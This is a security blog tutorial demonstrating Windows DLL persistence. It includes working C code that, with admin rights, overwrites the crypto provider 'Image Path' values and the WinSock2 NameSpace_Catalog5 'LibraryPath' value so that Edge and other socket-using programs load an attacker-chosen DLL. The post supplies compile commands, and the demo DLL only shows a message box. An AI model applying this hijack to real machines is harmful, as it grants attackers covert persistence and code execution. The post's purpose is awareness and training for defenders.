cocomelonc

cybersec enthusiast. mathematician. author. speaker. hacker

3 minute read

Hello, cybersecurity enthusiasts and white hackers!

pers

This post came about in preparation for a workshop on Malware Persistence techniques that I teach at various conferences in Europe and Asia. This post shows that interesting persistence methods can be found via Sysinternals Procmon via filters, this is a well-known and popular method, I just want to show it in practice. In my case, everything worked out thanks to one of the registry keys that is used by many applications of the operating system, in particular Microsoft Edge:

"HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64\000000000007"

Apparently this registry path is used by all applications that work with sockets.

practical example

First of all, I just start with simple filters in Procmon, like this:

pers

As a result we will get many many interesting records:

pers

As you can see, we can replace different registry key values:

pers

As an experiment I decided to replace one of these DLLs.

In C it’s looks like this:

#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;
  // malicious DLL
  const char* dll = "Z:\\hack.dll";

  // RSA
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider", 0 , KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // create new registry keys
    RegSetValueEx(hkey, (LPCSTR)"Image Path", 0, REG_SZ, (unsigned char*)dll, strlen(dll));
    RegCloseKey(hkey);
  }
  return 0;
}

or another value:

#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;
  // malicious DLL
  const char* dll = "Z:\\hack.dll";

  // RSA???
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider", 0 , KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // create new registry keys
    RegSetValueEx(hkey, (LPCSTR)"Image Path", 0, REG_SZ, (unsigned char*)dll, strlen(dll));
    RegCloseKey(hkey);
  }
  return 0;
}

It certainly worked:

pers

But the caveat is that the entire operating system froze after this and even the antivirus started freeze.

So i decided to start a new search:

pers

After a long search I found another interesting key and value in the registry:

reg query "HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64\000000000007" /s

pers

and tried to replace it. For this just update LibraryPath value:

/*
 * hack.c
 * Microsoft Edge
 * persistence trick v1.0
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html
*/
#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;
  // malicious DLL
  const char* dll = "Z:\\hack.dll";

  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"System\\CurrentControlSet\\Services\\WinSock2\\Parameters\\NameSpace_Catalog5\\Catalog_Entries64\\000000000007", 0 , KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // update registry keys
    RegSetValueEx(hkey, (LPCSTR)"LibraryPath", 0, REG_SZ, (unsigned char*)dll, strlen(dll));
    RegCloseKey(hkey);
  }
  return 0;
}

As you can see, the code is pretty simple as usual, just set value via RegSetValueEx function. In my case, hack.dll - just meow-meow messagebox:

/*
 * hack.c
 * "malware" for Microsoft Edge
 * persistence trick
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  nReason, LPVOID lpReserved) {
  switch (nReason) {
  case DLL_PROCESS_ATTACH:
    MessageBoxA(NULL, "Meow-meow!!", "=^..^=", MB_OK);
    break;
  case DLL_PROCESS_DETACH:
    break;
  case DLL_THREAD_ATTACH:
    break;
  case DLL_THREAD_DETACH:
    break;
  }
  return TRUE;
}

demo

Let’s check everything in action.

Compile our meow-meow “malware” hack.c:

x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

malware

And compile persistence script:

x86_64-w64-mingw32-g++ -O2 pers.c -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

malware

Then, run it on test victim’s machine (Windows 11 x64):

.\pers.exe

malware

As you can see, registry key value is successfully updated. Note that we need Administrative privleges for update this Registry value.

Then, try to open Microsoft Edge:

malware

malware

malware

For the correctness of the experiment, we will launch our Process Hacker 2 and check memory:

malware

malware

As you can see, hack.dll started correctly, the same effect will be for other Windows programs, even Procmon64.exe. I assume the behavior will be the same if you open anything that uses Windows sockets. To be honest, I don’t know what this particular registry parameter is used for, but it seems to have something to do with sockets.

So, everything worked as expected. Perfect! =^..^=

This PoC is how an attacker might use different Windows features like socket connections for running a “malicious” DLL.

I hope this post spreads awareness to the blue teamers of this interesting persistence technique, and adds a weapon to the red teamers arsenal.

This is a practical case for educational purposes only.

Windows Sockets
Malware persistence - part 1. Registry run keys
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

You may also enjoy